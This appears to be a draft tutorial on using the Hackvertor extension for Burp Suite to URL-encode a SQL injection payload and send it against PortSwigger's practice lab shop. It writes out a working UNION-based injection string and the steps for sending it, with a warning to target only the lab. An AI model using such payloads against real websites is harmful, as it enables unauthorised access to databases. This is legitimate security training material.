NEAR FINAL: Hackvertor for Burp Suite

Questions and observations

Explore

Getting started with Hackvertor

Tutorial: SQL injection attack

Try Hackvertor for yourself

Adam Meadows

Hackvertor in action

URL encoding a SQL statement 🎦

To help you understand how you might use Hackvertor, we’ll use the extension to insert <@urlencode> and </@urlencode> tags into a GET request. Hackvertor will then automatically convert tagged HTTP traffic into something that can be used in a SQL injection attack when the request is sent.

Not a Burp Suite customer? You can try this tutorial using the free Burp Suite Community Edition, which you can

download here⁠

In this example, we’ve identified a potential exploit in PortSwigger’s fake web store. We can launch a SQL injection attack on this store to retrieve a list of tables from its database by inserting the following statement into the category parameter in a GET request — but we’ll need to encode it first:

' UNION SELECT table_name, NULL FROM information_schema.tables--

Compare this to Burp Suite’s built-in encoding, for example. Without Hackvertor, Burp Suite could URL encode that statement instantly. To edit that, though, you would have to decode it and edit it every time we want to iterate that statement until we reach a successful SQL injection attack.

The URL-encoded statement below isn’t too complex. But if our first attempt to launch the attack failed, we might have to decode this statement to ensure we’re making the right changes:

%27+UNION+SELECT+table_name%2C+NULL+FROM+information_schema.tables--

Steps in this tutorial

In the example below, we will:

Visit a fake online shop with Burp Suite’s built-in browser, which will generate a GET request.

Transfer that GET request into Repeater, and inject a SQL statement.

Use Hackvertor to apply <@urlencode> tags to convert that SQL statement into something URL friendly.

Warning: When following this tutorial, only the website specified should be targeted.

Step 1: Prepare HTTP traffic

In Burp Suite, click the Proxy tab.

Under the Proxy tab, click the Intercept tab. Then click Open Browser.

Paste the following URL into the Burp Suite’s browser’s address bar:

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle⁠

⁠

Click Access the lab, which will take you to the fake online shop.

In the browser, under We Like To Shop, click the Pets search filter.

In Burp Suite, under the Proxy tab, click the HTTP History tab. Find a row where the URL column begins with /filter?category. Pets will be the value of this 'category' parameter.

Right-click this row. In the pop-up menu, click Send to Repeater.

At the top of the Burp Suite, click the Repeater tab.

In the Request editor, replace Pets with the following SQL statement: ' UNION SELECT table_name, NULL FROM information_schema.tables--

The top line of the request should now look like the screenshot below:

⁠

Step 2: Convert data and launch attack

Now we’ve got our example HTTP traffic ready in the Repeater tab, we can prepare that data by inserting <@urlencode> tags ready for conversion:

First, we need need to change the HTTP protocol to HTTP/1.1 to prevent the SQL statement being truncated on send — as explained below:

To the right side of the Repeater tab: Under Inspector, click Request Attributes.

Next to Protocol, click HTTP/1.1.

In the Repeater tab, drag-select the SQL statement that was previously inserted into the GET request.

Right-click and hover over Extensions. Then hover over Hackvertor.

Hover over Encode. Then click urlencode.

Above the Request editor, click Send. Hackvertor will now encode the SQL statement for you as it sends the request.

In the Response box, the contents of the response confirms that:

Hackvertor encoded the <@urlencode> tags successfully, as the server would have rejected the request due to the SQL statement not being URL-friendly — as the server returned a 200 response.

That the SQL injection attack was successful, as the response includes a list of tables from the website’s SQL database.

Hackvertor in action

URL encoding a SQL statement 🎦

Steps in this tutorial

Want to print your doc?
This is not the way.

Try clicking the ⋯ next to your doc name or using a keyboard shortcut (

CtrlP

) instead.